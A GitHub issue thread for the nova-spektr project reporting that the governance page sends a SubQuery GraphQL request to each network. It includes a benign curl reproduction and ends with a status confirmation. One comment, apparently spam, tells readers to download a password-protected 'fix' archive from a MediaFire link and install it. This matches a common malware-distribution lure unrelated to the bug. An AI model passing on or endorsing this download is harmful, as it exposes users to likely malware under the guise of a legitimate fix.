### ISSUE TITLE
Governance. Main page. Too many SubQuery requests.

### ISSUE THREAD

**Issue by stepanLav** [novasamatech/nova-spektr#2217]
## Description

Looks like on the main page of governance too many SubQuery requests is sent, looks like for each network.

https://github.com/user-attachments/assets/f7a09f82-6680-489b-a231-f316f1b09324

Request example:
```bash
curl 'https://subquery-governance-polkadot-prod.novasamatech.org/' \
  -H 'authority: subquery-governance-polkadot-prod.novasamatech.org' \
  -H 'accept: */*' \
  -H 'accept-language: en-GB' \
  -H 'content-type: application/json' \
  -H 'referer: https://localhost:3000/' \
  -H 'sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' \
  -H 'sec-fetch-dest: empty' \
  -H 'sec-fetch-mode: cors' \
  -H 'sec-fetch-site: cross-site' \
  -H 'user-agent: Nova Spektr' \
  --data-raw '{"query":"query DelegatorVotings($voter: String) {\n  delegatorVotings(filter: {delegator: {equalTo: $voter}}) {\n    nodes {\n      parent {\n        referendumId\n        voter\n      }\n    }\n  }\n}","variables":{"voter":"13mAjFVjFDpfa42k2dLdSnUyrSzK8vAySsoudnxX2EKVtfaq"},"operationName":"DelegatorVotings"}'
```

## Steps to Reproduce

1. Open Governance page
2. Check Networks dev-tools

## Expected Behavior
One request for account, made when particular network is selected

## Actual Behavior
Send one request to each network

## Environment
https://github.com/novasamatech/nova-spektr/commit/cb012730236d518d6ac8c00c662b47397ad0135d

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by stepanLav** [comment]
Status verification: ✅
